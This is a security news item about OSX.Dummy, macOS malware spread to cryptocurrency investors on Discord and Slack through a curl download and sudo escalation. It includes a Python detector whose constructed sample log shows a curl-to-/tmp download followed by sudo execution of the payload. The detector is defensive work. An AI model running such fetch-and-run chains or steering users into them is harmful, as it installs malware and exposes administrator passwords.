Fresh macOS Malware OSX.Dummy Targets Crypto-Currency Investors
Hackers are using a macOS malicious program to target people investing in crypto-currencies who use the chat platforms Discord and Slack. Dubbed OSX.Dummy, the malware relies on a rather crude infection technique; however, on systems that are successfully compromised the attackers can remotely execute arbitrary code.
A blog post dated June 29 by Digital Security's chief research officer Patrick Wardle explains that once the malware connects to the attacker's command-and-control server, the attacker can run arbitrary commands on the infected machine. Security researchers from UNIX were the first to find clues about the malware a few days earlier. According to Remco Verhoef, a senior researcher who reported his findings in a blog post dated June 29 on SANS' InfoSec, the past week saw a series of attacks against macOS.
Chat groups on Discord and Slack reported people impersonating well-known chat personalities and system admins. The people they impersonated were known for providing useful crypto-currency applications, which made it easier for the attackers to trick genuine users into installing the malicious software. Appuals.com posted this on July 1, 2018.
The attackers then lure ordinary end-users into running a tiny script that downloads a much larger file of 34 megabytes. This file, fetched with the 'curl' command-line tool, contains OSX.Dummy. Because of the permissions UNIX enforces, which hamper the attackers somewhat, the download is saved to a temporary directory.
When the malware runs, a macOS sudo command changes the program's permissions to root. Consequently, according to Wardle, the end-user is asked to type his password into the terminal. Apple explains that to run a sudo command in Terminal on a macOS system, the user must log in with the credentials of an administrator account that has a password. Invoking sudo therefore prompts the user for his admin password, after which the binary gains full access to the user's underlying files.
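The two-step chain described above (a curl download into a temp directory, followed shortly by sudo on that same file) is something a defender can look for in process-execution telemetry. The following detector is an added example and not code from the article or from the researchers it cites; the log format and the sample lines are constructed for illustration, and the hostname is a placeholder.

```python
import re
from collections import defaultdict

# Constructed sample of a process-execution log (not from the article):
# one line per exec, formatted "timestamp session user command".
SAMPLE_LOG = """\
1530300001 s1 alice curl -s http://example.invalid/payload -o /tmp/payload
1530300003 s1 alice sudo chmod 755 /tmp/payload
1530300004 s1 alice sudo /tmp/payload
1530300010 s2 bob curl -s https://example.invalid/readme.txt -o /Users/bob/readme.txt
1530300012 s2 bob sudo ls /var/log
"""

# macOS temp locations; /tmp is a symlink to /private/tmp on macOS.
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")
LINE_RE = re.compile(r"^(?P<ts>\d+) (?P<session>\S+) (?P<user>\S+) (?P<cmd>.+)$")


def curl_output_path(cmd):
    """Return the -o/--output target of a curl command line, or None."""
    m = re.search(r"(?:^|\s)(?:-o|--output)\s+(\S+)", cmd)
    return m.group(1) if cmd.startswith("curl") and m else None


def find_curl_then_sudo(log_text, window=300):
    """Flag sessions where curl writes a file into a temp directory and
    sudo references that same path within `window` seconds afterwards.
    Returns a list of (session, user, path, sudo_command) tuples."""
    downloads = defaultdict(dict)  # session -> {temp path: download ts}
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the constructed format
        ts, session, cmd = int(m["ts"]), m["session"], m["cmd"]
        path = curl_output_path(cmd)
        if path and path.startswith(TEMP_DIRS):
            downloads[session][path] = ts
            continue
        if cmd.startswith("sudo "):
            for path, dl_ts in downloads[session].items():
                if path in cmd and ts - dl_ts <= window:
                    alerts.append((session, m["user"], path, cmd))
    return alerts


if __name__ == "__main__":
    for alert in find_curl_then_sudo(SAMPLE_LOG):
        print("ALERT: curl-to-temp followed by sudo:", alert)
```

Only session s1 is flagged: bob's download lands outside a temp directory and his sudo call never touches it, so the correlation stays silent on ordinary admin use.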
Notably, according to Wardle, OSX.Dummy also stores the victim's password, again in a temp directory, for use in future attacks.
» SPAMfighter News - 09-07-2018